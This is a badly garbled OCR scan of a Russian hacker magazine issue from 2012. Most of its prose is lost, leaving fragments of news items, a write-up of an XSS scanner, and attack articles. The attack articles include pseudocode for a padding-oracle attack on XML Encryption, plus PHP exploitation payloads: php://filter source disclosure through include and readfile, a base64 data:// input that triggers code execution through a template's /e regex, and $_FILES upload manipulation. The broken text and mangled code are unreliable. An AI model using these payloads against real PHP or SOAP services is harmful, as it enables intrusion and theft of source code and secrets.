
Fl

01 [156] 2012

ANDROID

:230.

ENCRYPTION

XML-KOHTEHTA

.
,

----

PHONEGAP:


HTML5


(gam]land

hf.fun media
UJ = . - -

-; _ 0
n:1

iiiiiiiiiiiiiiio

-~ - N

-,rp.HEP
.....
~

lntro

nikitozz )) [nikitozfareal.xakep.rul
ctstep (steprareaJ. xakep .ru )
c(gorl (gorlum@real.xakep.ru )

PC_ZONE UNIS

(magglareal.xakep. ru l
. Klouniz (alexanderfareal xakep.rul

MALWARE SYN/ACK
UNIXOID

Step)) [stepffireal.xakep.ru l

cc dushock >> ( adushockfareal.xakep.u )

xakep.ru

ccgol)) ( golumfaeal.xakep.u 1
(pofakumekay.com )
[ g igorievafaglc . ru )
i xafaeal. xakep . ru l

R-

DVD

ant)) ( antfareal.xakep.u l
ccAd ushock andrushockfareal.xake .ru)
01g 1>> levdokimovdsfagmail.com )


Ui-
Security - pae

ART
-

(aliklaglc. rul

: . : .

PUBLISHING

000 , 115280, ,

. , 19, n,

5 , No 21.

.: 1495/935-7034, :

1495/545-0906

no

. :

1495/935-7034, : 1495/545-0906

. , :

n TECHNOLOGY

( f il atovacl glc ru l

100%. ,

(olgae mlfaglc.ru)

250 ,
. ?
, , :
,

. - .

. :

1-3 ,

- . ,

/korenfeldlaglc.rul

: >> ,

. ,

, nn,

,
- .
, .

, : .
,
, , .
n :

/alekhinalaglc.rul
(polikarpova@ glc.rul
( ]
(t a t arekova@g lc .ru l
/gospodinovataglc u l
(dubrovskaya@gjc.ru/
(bulanovalaglc.rul

l koshelevafaglc. u )
llepikova@qlc.ru ]
llukichevafaglc.ru )

V- : claimfaqlc.ru .

n : (4 95)545 -09-06

nn : 1495/663-82-77
: 8-800-200-3-999
:

101000, , , / 652,

115 !

shop.g lc. ru / xake p.

, , -

77-11802

14.02.2002

Zapolex, . 219 833 .

. :

n . , n
, .

nikitozz, rn. .
shop.glc.ru/xakep
vkontakte ru/xakep mag


- n.

: co n tentrglc.ru .

000 , , 2012

001



OMOHKASIRI

004

HEADER
004

MEGANEWS

016

017

Proof-of-cocept

011

hacker tweets
-

SS-

Dropbox AdWords

100

COVERSTORY

030

Adobe

COVERSTORY

COVERSTORY

018
L

Encryption

036

PCZONE

UNIXOID

hnG:nL5

102

107

Linux

042

Windows-apoe

tcpdump

Widows-cce

046

112

did-


Widws-?

117

Ubuntu 11.10

Oneiic Ocelot

050

Easy-Hack

054

SYN/ACK

118

060

D5

064

122

- SpyEye

068

Lotus,

072

Lotus Oomio tll

126

X-Tools

130

--

132

MALWARE

080

Wi32/0uqu: Stuxet

084

bootkit test

BitDefede, ESET NOD32, F-Secue, Outpost Secuity,


Risig >>

088

.N-

.NET Famewok

094

098

NAS
5- 6- NS-

Silicon

074

FERRUM

PoweSP060GBSSOV30525

PHREAKING
Loop
, n
n n

136

FAOUNIED

139

142

WWW2

FAQ

8.5
w-

144

2012
NY2k+ 12

EGANEWS

I
<< .

UBUNTU

SIRI


OMOHKASIRI

UBUNTU 06
n n

iPhone 45

Applidium

111

~.)

'.1

" On 19 rem1n d me
l's dad's b<rlhday "
'~ ~:J' r1

1'3 -cL 1

,(!

rJer '::,r

111

5ii,

i05 5.

n ,

n
. ,

19

Saturday
2012

n 5ii n
. -,

Oad's brrthclay

Andoid,

n 5ii
r;

~ ''1'

iPad.

Applidium: appl idium .com/en/news/

"

cack i ng si i .
:

iPhone 45

Canonical,

Debian,

Ubuntul , Ubuntu

n -

, n .

5. n 5ii

n , R- .

, n n

no
iPhone 45 .

Canonical ,
Windows 8, n

n\n,

. n,

. ,

. ,

Applidium

n ,

<< BCKpTA Siri .


,
n
,


Sii
.

n, .


>>.

iPhone

Apple . n,

Ubuntu 14.04, 2014 . n,

, n

n << n>>.
Canonical n
Ubuntu 12.04, n n
2012 . , L5-

[ n),

Windowsxp
WINDOWSXPCTAJIAKCO

APPLE

(CHRONOPAYI

, STEAM .

I .

. ,

! -

comScoe,

, -

, n

DDOS-ATAKY (Assist),

50,81

<<>>.

Steam.

001,


ltel 11 11 -11 11 11 11
, .
ltel 2011 . . ltel, ltel, ltel . .
* .

MEGANEWS

& F , 600 .

POLAROID

DNS

, DNS-apeco.
, ,
-
n.
DNS -

2008 n
Polaoid
,
w

11-

Hotmail, Gmail, Google, Microsoft


, Uol, Terra Globo.
, , , google .com ,
I- Google,
-. n
. n,

Google n
n Google Defender, n
.

, ,
27-

Polaoid
n

n ,

, 11-

n DNS-cepepax

n n

, DNS-.

, , n

Ghost Click .

Polaroid

Z340
ZINK

lnstant Digital Camera.


Zero lnk Printing, n

, n

DNS Changer.

OS
DNS.
I- n 15

Windowsoep

n . ,

! ,

n >> , .

, n .

n ,

. , , n

,nn

n .

n .

2, 7"

14 Mn.

100

, n

500

[ n], n

SD .
I 43 ] F/3,2.
[ -1280 720 n ]. Polaroid Z340 n
76 102 , $20 30

<<

. - ,

no

25 n.

14

, << n n

. - [ - ]
,

, DNS-cepepa

Polaroid. Z340 lnstant Digital Camera $300.

ln ternet Systems Consortium .

Rove Digital.

- , n .

, .
- ,
, .

AVIRA

AESCRIPT.DLL

006

EstDomains-oeoro ,
nn , .

2008, n

ICANN

n .
n

22

85 r~ .


MEGANEWS

, CONSUMERIST, RIAA .

, WI-FI,


.

,

1.6.4.

. ,

, .
,

,
.
, ,
,
.

CMS,

, .

, , ,

. ,

6 ,

1.6.4,

, ,

. -, ,

10 ,

/GS. ,

, , ,

, 802.11 .

-,

. , ,

iPhone45,

[ 100 ),

802 .1 1, .

, .

, ,

[CDN) .

Apple n
- :).

.
, - ,
- .


WEXLER.BOOK 7001. Wexler


WLR. 7001 7.0"
,

Jj

._d

.....

008

Firefox with Bing


ing

. 4

( 32

microSDI ,
, ;

~
KaneOIAII~

F. -

<< ,

GGL!~~ -,

lterfilm.ru

1500 mAh, ,

Big

WEXLER.BOOK 7001

Microsoft.

Puzkarapuz.ru .

: 5 990 .

Firefox.


MEGANEWS

ENTENSYS COMMTOUCH , 6, 7% n .

,
>>

.
YouTub e

:
Aoymous

[Zetasl

. , >> ,
, >> ,

. ,

26 2011

- . ,
- .
-.

Anonymous

- ,

. ,
,

, -
>>
, ,

. , OpCatel [n
~. ,
, ,
,
.
, , -

OpCatel .
.

.
, ,

, , .

Lolita City - ,
100 .
F e edom Hosting,

Anonymous n

>>. Opeat io n Daknet

.onion- Hidden Wiki,

. ,

S- .
,

Lol ita City


. n

2000-6000
.

. -

SQL- .

, , ~

Feedom

Hosting . ...
: F eedom Hosting,
40 ,

38

n:

pastebin . com/1 LH nz EW.

<<IT
.

,

>>
010


laEdiStrosar:

laiLLUMINATI:

laRuCTFE:

>> [

OldEuOpe

#RuCTFE
RWTH, ,

t.co/IUII94Ko .

l.

1!!!1 :
lilil CTF

ciWeldPond:
cljkouns:




. Ggl--

Google,

OllyDbg
_noRE.exe

IDA

ciStephenwest:

1!!!1
lilil

I-: http:!/4 ..2;


http:/196.4; ht.p://71.3;
ht.~ .

-. :1
, Google

Wi-Fi,
_nomap. :1

...
clinsitOr:


ciRogunix:

DS/-

ICMP efCount
TCP/IP [MS11-083I 232
UD-, , 250

Oday BIND.

How to do pentest:
1. Draw line with .
2. Check line.
3. If visible, works.
4. If line, does not work.

1!!!1 :
lilil - .
pentest?
1. [) .
2. .
3. , ,
4. , ,

.
.


DNS- cepepa

BIND,

DoS Oday.

52.

t.co/aY.PCMyRy.

lafjserna:

Micosoft/MSRC .
!

Google.

Shodan

++.

Siemens Simatic.

t.J;o 1l1Q0b3cq .

cljduck1337:

1!!!1 :
lilil . SCADA-

: bash: ./:-

. S-
- .

1!!!1 :
lilil -
,
,

. !

cljOOru:


clmikko:
-

Windows [NT/2000/
XP/2003Nista/2008/7/81.
: .. _o/oBiJ;17 .Q .

: << .

#wostpasswod

1!!!1
lilil

. ?


:1

011

( 926 ), ,

MEGANEWS


Nito,

lociJtionofinfected computer s

tioUIIpi8CIIIftlleM

, n
? ,
, .

n ,
.

PC.WNieO.US,...IJ

.,_ICWIIIcll'rlllf.
~llwpop~

- VideoGhost,

WUII~4if ... tflt.tllilo


-!I\IC11WiW
.-,.un

. ,
, .

ol~oi!Wpail~

IO'f2~htountry

,...,.

loulwdCIidlotor&D

fiOclns' l'lt.........IOif

,_,.,otortcrn-

, [
-- 2 ] .

VideoGhost

,
US-. US-
n - ,
.
US-,

Stuxnet, , -

n , n .

cVideoGhost .
VGA, DVI DMI,
$200.

, ,

Symantec. ,

Nito,
n ,

29 19 ,

[,

]. n ,

n. -
,

Poisonlvy].

, .

Symantec ,

. Nito :
, .

&

& BSUP a

GGL,

FACEBOOK.

&

Tusted Fiends

Andoid ,

ICANN

<<.

no nn

012

18,7%,

Mini,
13,1%.


MAIL.RU GRU , Twitter. , .

HAANDROID'E

BITCOIN

BITCOIN

BitCoin

n .
,

, . ,
n

Mt Gox,
BitCoin,
, . , BitCoin

FXI ,

The Cotton
Candy

$200,
n


2012 .
,

cWindows 8
.

, ,
, n
.

lntego,

Devii Robber,

BitCoin .

.
,
, ,
, ,

Bi tCoin,

DeviiRobber

05 ,

n
.

The Pirate . ,
Graphic Converter 05 .

FXI

The Cotton Candy

[ - << >> ,

n
,
. ,

Devii Rob ber

21 , , ! .

itin - ,

U5-,

. R-

5am sung Exynos 1,2 [

, 5amsung Gala xy 5111.


Mal i-400 , micro5D [ 64 I ,

Bluetooth, HDMI2 .1

Firefox,

5afari

Vidalia-
TOR.

U5B 2.0. ,
n 1. h Cotton Cand y
Android 2.3.

, D evii Robb e roapye

, , ,

Wi-Fi

. De vii R obberae ,

Android.

, ,

BitCoin
Oper

HDMI, U5B [ n
!. Bluetooth ,

Microso ft n ,

. ,

Android

Market,

BitCoin.

: 1 n
2, ,

50 , 1

, GOOGLE ?


, n ,

.
,

SSID

, n ,

Bi tCoi n. -

n
,

<<_NOMAP>>,

GOOGLE

n , ,


, .
, .

BitCoin, :

- >>.

013

MEGANEWS

LINUX3.1, kl . g .

CTAHAADOBE

FLEX

FLASH
,
,
, , n .


, , , n
.

iSpy n

100%.

, , n

iPhone ndid

[magnified keysl. iSpy n


n, n,

n n
- !
,
.

n ,

d Flash n

60

n ,

90% .

. n n

n . n , ,

750

( 7

n n .

% n!

n DSLR-aep n n

n .

12 . iSpy
magnifi ed key n -

dobe n n n
Fla sh l . Fla sh
n n
, n n

Adobe Al R

n n.nn

Android

PlayBook, n
Flash Player

n .

n n
n

HTML5. n

n , n
n

Apple,

Flash . , , n

, n-n

Flash Pl ayer iOS.


Fla sh Pla ye r n Apple iOS
,- n . Adobe Fl ash
n - >> Apple.

, n

Flex SDK. Flex 4.6 SDK,


29 , n n source.

AMAZON

GGL

Shdd Challenge

, 2012

, .

47

DARPA

50 .

011.

42


500 Wikimedia.

IPHONE
~~>>

iPhone Dev-Team
n

. ",--"

iPhone4S.


.

n,
,
.

iPhone 45


. Chonic

DevTeam iPhone

. , , ,

iPhone,

& , .
, , ,

, iPhoe
:

45, iPhoe
iPhone 4 iPhone 3G5,

. ,
,
>> . , ,

. :

51 -

& , ,
,

. &

! >>, >>,

, l.
, -

youtu.be/gofpeiTXI5U. :

&

space

1611)

<< >>;

51 - &

T-Mobile;

, Wi-Fi !

<< >>,

<< >>;

);

<< >>,

<< >>;

iPhoe ;

<< >>;

EDGE

51 -,

51 - T-Moile

. ,

<<

20-30 ;

iPhoe,

>> iPhoe T-Moile,

<< >>;

MCAFEE:



75


.HEADER

Proof-of-Concept
SS-

100

, .
, SQL-,
, ,

. , ,-

map,

sql-

SQLi

. ,
SS- . - .

Damn Small XSS Scanne [DSXS).

XSS

. Coss-site scipting

SS- -

[XSS]-

n.

GET-

S-

SS-,

n , n

n- n , n

n JS-.

-n

Scanne

Damn Small XSS


[DSXS]

n .

-, .

SS- n

n L-

n GET/POST-anpoca .

- , ,

n, n

[
] ,

-.

n .

n- n.

n n

n,

< hef= " ... ">, ,

> -

SS-.

SS-n. ,

-n

n . n ,

DS XS

. ,

. -

. n,

n,

L- <scipt> .. </scipt> [ n
] ,

n JavaScipt-o. ,

n, n

n n],

L- < hef= " ... ">,

DSXS

n [

. ,

> n n JS-,

<scipt> ...</scipt>.

n. , ,
n n

n XSS
zero.webappsecurity.com

016

DSXS

Use-Agent, Rf

, n SS

n GitHub [https:Ugithub.com/
stampam/DSXS ]. ::

? n

Python,

Cookie

- .


10 DROPBOX
ADWORDS
10

[ ] :

, , ,

1. << >>.
2. [, D].
3. ,

50

. -

$99,00 . ,

[, , ,
, ].

3.

>> : ,

600

250 . ,
1 , ,

- . ,

.
>> ,

, D,

-.

: d, f oline stoage,
f,

online backup

, - ,

, D -

- , ,

URL

online backup, online backup data,

, ,

[, it . ly/ud69i ]. ,

Google.

space.

. ,

D Refeall Status [,

httR:Udb.tt/UfxuFBm ]. , .

10

, D

. AdWods !

,
, .
,

. ,

[Cost-Pe-Ciick].

[ it.ly/xNKyB ].

. -

D- .

, ,

, .

? , ,

? - ,

. - . ,

D. -, .

:]

AdWods,

-, AdWods, , ,

?,,- . ,

Google]. . :] :::

! ,

Google,

1000

. .

Qit.

l y/AEsg1 $75
AdWods, ,

.: ] ,

e-mail [

- ], [
-

about.me], .
e-mail.

Updated

Statu.s

3/ 26/ 2011 7:4 5

,.

3/26/ 2011 6: 52
3/ 26/ 2011 6:37

Jo ined
Completed
Jo ined

3/ 26/2011 6 :08

Jo ined

3/ 26/2011 5:23

Completed

3/26/ 2011 5:14

Completed

Google AdWods [ adwods.google.com ].

3/ 26/2011 4:49

Completed

3/ 26/2011 4:32

Compl eted

[ ] .

?
? , ,-

-7

>> .

[ ,
, ],


- 250 Dropbox

017

COVERSTORY

lplaintextl llirstfaplaintext .su, www.plaintext.sul

BEAST Padding Oracle Attack


.NET Framework,

Encryption,

XML

L-.

XML ENCRYPTION
www.w.org/TR/
mln-r/

Framewok "ax [ n

XML Encryption

w .

bit l/u
r

XML

Encryption.

XML Encryption,

2002

XML
.NET, Apache Axis2,

JBOSS . .[.
-
n,

Microsoft

Encyptio n n

XML

Red Hat.

,
L- ,- ,
L--
. n
, n

nn , - CBCI.

018

, n

AES

DES . n

AES [


ISJ*iiirIId

, n

XM L En cypt ion

16 , 128 !

. ,
,

.
n ~ .

IIVI,

XOR,

.

,

IV1[0]

// encryption
C[0] = AES_ENC(k, IV xor M[0]);
C[i] = AES_ENC(k, C[i-1] xor M[i]);

// decryption
M[0] = AES_DEC(k, C[0]) xor IV;
M[i] = AES_DEC(k, C[i]) xor C[i-1];

k-

, - , - ,

IV-

ll.

Attack.

BEAST

P addig

. .

, , :

XOR

IV

MSK, IIV MSK, C[DJI


[) MSK. ,

. ,

12

Dx05. ! 16 !,
, 15

MSK,

, 16- 10.

. ,

XM L En cyptio.

XML

En cyptio

, .

, , ,

ASC II .

ASCI I

, NULL ! Al,
! Bl. ,

, ,

>>. ,
, n

. ,

,

16

tue, [) =

AES_DEC _
CBC[k, IIV, C[OJII NULL, false -
.

, ,

.
:

1.

IV1,

[I V1, C[O] I .

niV,
lniV, C[O]I . tu,
false .


! !


IV1

= iV,


WS-SECURITY
WS-Security -
SOAP, _
-. WS-Secuity XML Encyption XML
Signatue.

2-3 ,

, ,

2.

. [] ,

! .

[0].
XOR []

IV.

[, AES_DEC ,

msk =
repeat

XML

XML ENCRYPTION

Extesie Makup Laguage [

msk++
IV2 = IV1 xor (0...0 || msk || 0...0)
// msk is in the j-th position

XM LI

XML

, < >

[odel.

until Server((IV2,

[ ] ))

==

, ,

true

11

"

[
, . .l

Iput:

XML.

Output:
j-

&lt; &gt;
&

&amp; >>.
XML ti.
W XML Sigatue W
XML ti, XM L

[]),

s-

XML

C=(IVl,

XML

X[j] = ASCIICode(NULL) xor IV2[j]

return X[j]
= AES_D EC(k, [])

XML

ti,

. ,

[ , , . . l .
. j-
, ,

j-

<CipheValue>, ,
, .

. , ? : .

<EcyptedData>.

!:

,
,

AES_DEC_CBC(k, (IV2,
IV2 xo r [].

[]))

IV2 xor AES_DEC( k,

[])

. <CipheValue>

<?xml version='1.0' encoding='utf-8'?>
<EncryptedData Type='http://www.w3.org/2001/04/xmlenc#Element' xmlns='http://www.w3.org/2001/04/xmlenc#'>
  <EncryptionMethod Algorithm='http://www.w3.org/2001/04/xmlenc#aes128-cbc'>
  </EncryptionMethod>
  <KeyInfo xmlns='http://www.w3.org/2000/09/xmldsig#'>
    <KeyName>John Smith</KeyName>
  </KeyInfo>
  <CipherData>
    <CipherValue>A123456...</CipherValue>
  </CipherData>
</EncryptedData>

020

XML Encryption


XM L

E ncyption

n n ,

<EncyptionMethod>.
n n n,

n L- .

, L-,

. ?:-]

XM L ti

v Secuity,

n n

. ,

L- !

XML], n

. n

. . ,

n <EncyptedData>. n td

!, , -,

Element -

, L-

, . ).

. Encypted

-,

Content

, .

, . . n Encypted

,- -.

Text

Contet,

n Encypted Contet,

Paddig

l-,

. , n n

Oracle Attack,

Axis2,

ASP.NET),

.net.

. , n

XM L Famewok'o

n .

- .

UTF-8,

XM L E cyption

n n

, .

,

S-.

, n

XML

. n

Receive,

UTF-8-

, ,

lline feed ]

lcaiage tu]. , n

ASCII

Dispatch . Message
message flow
SOAP n ,

UTF-8.

n,

ASCII

128

Axis2 . :-]

! 4]. ,
,

AXIS2

- ,

Axis2.

,
tue
n n
-. nn

secuity

Apache Axis2

Famewok,

Rampat WS-Secu ity.


n
Signatue

XML

Encyption

false

. n

1.

fault.

secuity

fault

XML

. , ,

SOAP.

Axis2

Famewok, n

? , n

001

lmessage flow]. lmessage flow]-

S- ! ],

OxlO,

n n

n ,

2.

n n. S-

n, n

n>> ,

Message

Receive, , ,

Sevice n .

, D - , ].


: st, Secuity

Axis2
Dispatch . Secuity,

ASCII Oxl F ! 09,

- L-
, &

IOx26] < >> > .



XM L SIGNATURE

n ,

XML Signature -

n W.

ASCII !
]. n n
n >> <<& >> < >>,

n n n

XML


XML.

021

COVERSTORY
. ,
, , ,
, 16-
, tue

false.

, <<> S

, . ,

tue, SOAP(AES_ENC_CBC[k, [IV, CIJI


secuity

fault, false .
fault ,

, secuity

, L- :

PAD(M) ;; (IV xor AES_DEC(k,

10

Handlers (intercepters)

))

, L-<>,

Message flow Apache Axis2

</>.
2

<<&>>,

<<&gt.

. [FindiVI
. ; [IV, [1], ... , C[d]l

s-,

i, << >>

(;[iv, C[i]l.
secuity

fault,


, ,

, .

[FindXbytel <<n
>> [
FindiVI j- X[i][j]
X[i]; AES_DEC[k, C[i]l. ,
.

.
.

C;[IV, [1], ... , C[d]l,

Input: C = (C[0] = IV, C[1], ..., C[d])
Output: M = (M[1], ..., M[d])

.
,

C[i] C[i-1].
,

for i = 1 to d do
  iv = FindIV(C, i)
  for j = 1 to 16

ASCII [

UTF-81. ,

    X[i][j] = FindXbyte(C[i], iv, j)


  end for
  X[i] = (X[i][1], ..., X[i][16])
  M[i] = X[i] xor C[i-1]

, n
,

Dx01 [
!.

end for
return (M[1], ..., M[d])

.
,

[ ,

! .
:

--

FINDIV FINDXBYTE
FindiV n

, , ,

W n web-sevice n ,
n n n

FindiV FindXbyte .

machine-

- .

to-machine-a . n n

n - n

, , ,

. n

, ,

WSDL !Web Sevices Desciption Languagel, XML. -

: <

, nn n

01 .

RPC IRemote du calls,

IV,

!,

SOA !Sevice-oiented achitectue,


- ! REST [Repesentational state tans

- , , ,

fel. n

n n

, , <<

GET, POST, PUT, DELETE

n , n .

022

. . n

FindXbyte. n ,

f-3 .


[Table: ASCII character table (Dec., hex code, Char.) for codes 0-127, grouped into numbered blocks]

. - , n

-, -, n

[ ,

. n

-, ,

[ ]. , ,

XML 5chem'

n. ,

, ,-

[L-]

, ,

. , ,

[, 150/IEC
n

, , ,

19772:2009],

051 [n
, XML Encyption 55L/TL5,
n 5] .

. ,
,

XML

Encyption . , ,

[ . ],
u .


,
,

n , n n

n . ,

XML

5ignatue.

, n

XML

5ignatue

Wappig, , n

XML

epic fail .

Encyption

side-channel,

, -
, n . n

nn / .

Juaj 5omoovsky i Jage,

n- ,

, n n

n n .

. ::


PrOxor [php.m4sqllagmail.com, rdot.org/foruml

$ FILES
,

'-"


il . ly/sfDcys
noce

L ightig

,
,

Template.

4.3
. [

blt.ly/ttvWV -

, . . l <<

LightningTemplate.
it.!y/mdrdqf
ca,

File path

injection.
pastebln.com/1edSuSVN
- n

>> .
.
,

, .
,
:

print_r(stream_get_filters());

File path

injection.

. steam _ filter_ append/

it . ly/g6ztD -

$_FILES.

':,~qt\0~

-____... ,.

contents

fopen,

......,.., .L.oc...... ",....,__Pif'

~~

file_get_


n.


n .


steam_filte_pepend n n php://f ilte.



, ,
.
:

$fp = fopen('php://output', 'w');
stream_filter_append($fp, 'convert.quoted-printable-encode');
fwrite($fp, "I \v Love \v PHP.\n");

if ($closing) {
    $consumed += strlen($this->_data);
    $str = nl2br($this->_data);
    $this->bucket->data = $str;
    $this->bucket->datalen = strlen($this->_data);


,

POST, Base64 :

readfile("php://filter/read=convert.base64-encode/resource=php://input");

Secure [9ist.github.com/600388/cd99ae03c3

<head>
<meta charset="utf-8" />
<title>{{ title }}</title>
</head>
<body>
<h1>{{ title }}</h1>
< > 11 {{ name }} </ >
1

< > {{

meagelafe

}} < / >

<h2>Items</h2>
<ul>
{% for item in items %}
{% if item %}
<li>{{ item }}</li>
{% endif %}
{% endfor %}
</ul>
</body>
</html>

, .
, ft-,

gz-,
:

copy('compress.zlib://ftp://user:pass@ftphost.com:21/path/file.dat.gz', '/local/ /of/file.dat');
php:// filte
- . ,

include($_POST['inc']);

sample.php #

allow_ ul_ic l ude


= Off >>
RFI.

<?php
require_once 'LightningTemplate.php';

--

S- :

$items = array(
    'hoge', null, '<b>fuga</b>',


inc=php://filter/read%3Dconvert.base64-encode/resource%3D/path/script.php


,
-

. !

lG

    'piyo',
);
$lt = new LightningTemplate('sample.html');
$lt->title = 'Sample Template';
$lt->name = 'World';
$lt->message = '<b>hi!</b>';
$lt->items = $items;
echo $lt;

, , ,
. -

sarnp le_ca che.php #

. ,
12.

< ?php

. ,

require_once

filte !
] .

, .

$items = array(
    'hoge', null, '<b>fuga</b>',

$lt = new
private $_data;

, $closing
TRUE. :


'piyo' ,

);

$this-> _data >> :

while ($bucket = stream_bucket_make_writeable($in))
{
    $this->_data .= $bucket->data;
    $this->bucket = $bucket;
    $consumed = 0;
}

'LightningTemplate.php';

LightningTemplate(
    'sample.html',
    new LightningTemplateCache_File('./cache')
);

$lt->title = 'Sample Template';
$lt->name = 'World';
$lt->message = '<b>hi!</b>';
$lt->items = $items;
n

Lightning Template

if (!empty($this->bucket->data))
    stream_bucket_append($out, $this->bucket);
return PSFS_PASS_ON;
}
,

PSFS_PASS_ON.

include("./LightningTemplate.php");
$lt = new LightningTemplate('./sample.html');
$lt->title = 'Title';
echo $lt;
L-:

. .
:

stream_filter_register('convert.nl2br_string', 'nl2br_filter');

<html><head>
<meta charset="utf-8" />
<title>My Title</title>
</head></html>
,

L- . ,

include,

, ,

- ,

, .

. ,

Google Code

Seach.

steam_filte_egiste.

L-. :

Lighting-Temp l ate !
!, . ,

sample.html:

public function filter($in, $out, &$consumed, $closing)
while ($bucket = stream_bucket_make_writeable($in))
$patterns = array(
    '/\{%\s+if\s+(.+?)\s+%\}/e',

<html><head>
<meta charset="utf-8" />
<title>{{ title }}</title>
</head></html>

);

$replacements = array(
    '"<?php if ('.\$this->condition($1).'): ?>'",

2
3
4
5

class nl2br_filter extends php_user_filter {
    private $_data;

    function onCreate()
    {
        $this->_data = '';
        return true;

7
8

. , ,

}
/* n /

g_l

puiic

. ,

function

fi~er($ i n ,

$out , &$consumed, $closing)

{
/*

.,
while ($bucket = stream_bucket_make_writeable($in))
{
    $this->_data .= $bucket->data;
    $this->bucket = $bucket;
    $consumed = 0;

/*

( ukt).

.,
if ($closing)
{
    $consumed += strlen($this->_data);
    $str = nl2br($this->_data);

if (!empty($this->bucket->data))
    stream_bucket_append($out,

PSFS_PASS_ON;

{% if print_r(ini_get_all()) %}


- -. ,
,
. , :

include("./MYLightningTemplate.php");
$f = $_POST["file"];
readfile($f);
, .

$this->bucket->data = $str;
$this->bucket->datalen = strlen($this->_data);

return

'$_data'

026

'"<?php if,

. ,

22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

);
$bucket->data = preg_replace($patterns,
    $replacements, $bucket->data);

$this->bucket);

S-

file :

file=php://filter/read%3dconvert.lightning_template_filter/resource%3ddata://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2FsbCgpKSAlfQ
,
,

, ,


-----------------2421143186617

S- :

----------------------------- 2421143186617
-
php_use_filte.

: filte, t, oCiose.

Content-Disposition: form-data; name="uploadfile"; filename="hello.txt"
Content-Type: text/plain

filte, :

1.

$i - , ,
<< , .

2. $ut- , ,

<?php

echo ' Hello!! ! ' ; ?>

----------------------------- 2421143186617 --

3. $cosumed- , ,

4.

, .

hello.txt, < ?php echo

$closig- , ,

- ,

'Hello! !! ' ; ?>.

TRUE,

phpseUm44, hello.txt.
,

filte

).

1. SFS_SS_N-

$_FILES :

2. SFS _ FD _ - ,
$out .
3. PSFS_ ERR_FATAL ldefault) - pooa .
[t/is ,
. !,
), t,

Array (
    [uploadfile] => Array (
        [name] => hello.txt
        [type] => text/plain
        [tmp_name] => /tmp/phpseUm44
        [error] =>
        [size] => 33
    )
)

. t

FALSE
TRUE . o[lose

! ).
,
steam _fil te_egiste.

, $_FILES[uploadfile][type]
Cotent-Type, .

, -,

, :

. , ,
.

$_FILES["file"]["type"] == "image/gif"

tl

move_uploaded_file, .

getimagesizel). , ,

, , . .

, IF-

, .

- . ,

. , -

, ,

pic.php.myext -.

, -

,
L-, :

,
.

, $_FILES.

<form action=upload.php method=post enctype=multipart/form-data>
<input type=file name=uploadfile>
<input type=submit value=Upload>
</form>


, ,-
.
bugs . php.et ,
, - .

:) ,

Upload, S

/ ,

, Cotent-Type

$_ FILES [ uploadfile]

[name] . ,
,

Content-Type : multipart/form-data; boundary=


-. Uni-

027

COVERSTORY
-

. Windows-aax n
.

.
.

$_ FILES.
Qwaza d o t.og .

<form action="upload.php" method="POST" enctype="multipart/form-data">
<input type="Hidden" name="MAX_FILE_SIZE" value="10000000">
<input type="file" name="file[tmp_name][">
<input type="file" name="file[size][">
<input type="file" name="file[name][">

BlackFan, , ,
.
. , ,

<input type="submit" value="submit">
</form>

- $_FILES :

foreach ($_FILES["file"]["tmp_name"] as $key => $name)
{
    echo "Size:" . $_FILES["file"]["size"][$key] . "<br/>\r\n";
    echo "tmp name: " . $_FILES["file"]["tmp_name"][$key] . "<br/>\r\n";

$_FILES[ "file" ][ "tmp_name" ][ "[name" ]


n :

$_FILES[ "file" ][ "tmp_name" ][$key]


    if ($_FILES["file"]["size"][$key] > 0 &&
        $_FILES["file"]["size"][$key] < 1024)
    {
        echo "Ok<br/>\r\n";
        copy($_FILES["file"]["tmp_name"][$key], 'test.txt');

$_FILES ( ,
) .
, .


( upload.php),

}
}

L-, secet.
,

php, , upload .php,

1.

secret.php,

(, , <?php ?>).
~-::

class

'li~t./SocJr:~t/i!lt:ta.php' ;

St.reaa_Filter_iarr.socJtet

2. , <<1 >> .
<< 1 .

extud8: ._,_.er_tilter

(
t

PIUVJISG - :
J. ;

t. UOict

,
:

prot.ect.ec1. $tiarta:
proucted

$ht~;1 ;

protected. faock 1;

$_FILES[ "file" ][ "size" ][$key] >0


"' @pat:u z:~sourc~ $ in


"' Qpara~~. te:soutce liout
Qparaa int ''consuae:d
Qparu bool liclo:sinq
Breturn int
'1
.P*Jit: hllcti.oa tilter (Hn, $out, " consuud, $clos1nq)

<<f ile[tmp_ nameH secet.php,


- <<1. ,
test .txt.
secet . php, txt,

wld.le

( liUcket

streaa_uc.ket_uke_wteale ( Hn ))

, .

swi.td. f'this- node ) (

.....,

PRIVJISG:
1ith1s->t.io.z:t:a->sessaqe (ftha->chonnel ,
lt ::

'ucket->date );

, ,

Content-Type (, ) .
n ,

:. lt: : NOICI :

defa.lt :
lithis -> tiarra->nouce:l!essaqe ( lit.hi.s-><:h~l .

liucke:t->da.ta l:

test .txt. !

"....,

<<
licon:sua!:d -

Sbuc.t:et- >do.t..a.le:n;

streaa_ucket_app~d ( ,out,

'uctet);

move_uploaded_file .

. (, ,
, )-

/"
r:il r i nitiali:r:e:r

imageceatefom*/image *.

@retum bool

, , ,

'1
.-uc h8ctioa o.c:reu.e ()

. ,

(1sset( lit.his->par;8:a5{ 'socket' ))) (


lisock ~ m.aa~ ~this->parus [ 'sock~t' ];

( 1.ss~ t( Hh1s->paraas { 'chann~l' ]))

HJus- >channe.l -

$img = imagecreatefromjpeg($_FILES["filename"]["tmp_name"]);
imagejpeg($img, "uploads/" . $_FILES["filename"]["name"]);

~thls->poru.s { ' chann~l'

);

JPEG,
U

( 1.ss~ t(~th1s->par~ [
Sth1s->ted~

aobl' JI) (

Sth1s->a raas r 'aod~'

1:

IF- .
, -

onCeat e n

028

. , ,


. ,
,
.

, imageceatefom*
,
, l

, .,

2009 ,

, . ,

, G-

base64_ecode ,

<< >> !!, <<. >> <<[ >> !

, , :

!.

$jpegimage = imagecreatefromjpeg(
    "data://image/jpeg;base64," . base64_encode(
        $sql_result_array['imagedata']));
imagejpeg($jpegimage);
,

, .
,
,

<form action=>
<input name= "goodvar .(" >
<input name= "goodarray(foo)" >
<input name= "badvar[ [" >
<input type=submit>
</form>

. ,
,

index.php :

, -,
,
, ,

<?php
print_r($_GET);
?>

imageceatefom*/image*, :
:

foreach ($_FILES["file"]["tmp_name"] as $key => $name) {
    echo "Size:" . $_FILES["file"]["size"][$key] . "<br/>\r\n";
    echo "tmp name:" . $_FILES["file"]["tmp_name"][$key] . "<br/>\r\n";
